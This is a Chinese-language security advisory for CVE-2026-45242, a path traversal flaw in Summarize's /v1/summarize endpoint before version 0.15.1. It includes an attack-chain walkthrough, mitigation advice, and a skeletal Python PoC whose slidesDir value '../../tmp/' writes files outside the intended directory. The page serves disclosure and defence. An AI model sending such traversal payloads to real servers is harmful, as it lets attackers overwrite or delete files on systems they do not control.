CVE-2026-45242 CVSS 7.1 高危

CVE-2026-45242: Summarize路径遍历漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45242

漏洞类型

路径遍历

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Summarize

漏洞概述

Summarize 0.15.1之前的版本在/v1/summarize端点存在路径遍历漏洞。经过身份认证的攻击者可以通过在slidesDir参数中注入绝对路径或目录遍历序列（如../），将slide_*.png和slides.json文件写入系统任意可写目录。此外，攻击者还可利用该机制删除指定位置的匹配文件，从而破坏系统完整性并影响可用性。

技术细节

该漏洞源于Summarize守护进程端点/v1/summarize对用户输入的slidesDir参数缺乏有效的安全校验。当应用程序处理包含此参数的请求时，未对路径进行规范化处理或限制在特定目录树下，导致攻击者能够控制文件写入的绝对路径。攻击者仅需低权限账户即可构造恶意请求，利用“../”或根路径符号将生成的图片和JSON文件写入敏感目录（如Web根目录或系统配置目录）。结合文件删除功能，攻击者不仅可能覆盖关键文件，还可能删除系统文件，造成拒绝服务或为后续攻击创造条件。

攻击链分析

STEP 1

1. 信息收集与认证

攻击者识别目标运行的Summarize服务版本（<0.15.1），并获取有效的低权限账户凭证。

STEP 2

2. 构造恶意请求

攻击者向/v1/summarize端点发送POST请求，在slidesDir参数中注入路径遍历序列（如"../../../tmp/"）或绝对路径。

STEP 3

3. 写入恶意文件

服务器接收请求后，处理逻辑将slide_*.png和slides.json文件写入攻击者指定的任意可写目录。

STEP 4

4. 删除文件与影响

通过重复请求或特定操作，攻击者触发删除逻辑，删除指定路径下的匹配文件，导致数据丢失或服务受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target:port/v1/summarize"

# Exploit payload: Path traversal to write to /tmp/
# Adjust the payload based on the actual API structure
payload = {
    "slidesDir": "../../tmp/",
    # other necessary parameters for the request
}

# Headers (Authentication required as per PR:L)
headers = {
    "Authorization": "Bearer <your_token>",
    "Content-Type": "application/json"
}

r = requests.post(url, json=payload, headers=headers)

if r.status_code == 200:
    print("[+] Exploit successful. Files may be written to /tmp/")
else:
    print("[-] Exploit failed")

影响范围

Summarize < 0.15.1

防御指南

临时缓解措施

如果无法立即升级补丁，建议在应用防火墙（WAF）或反向代理层面对请求参数进行过滤，拦截包含“../”或绝对路径符号的请求，并临时禁用受影响端点的非必要访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表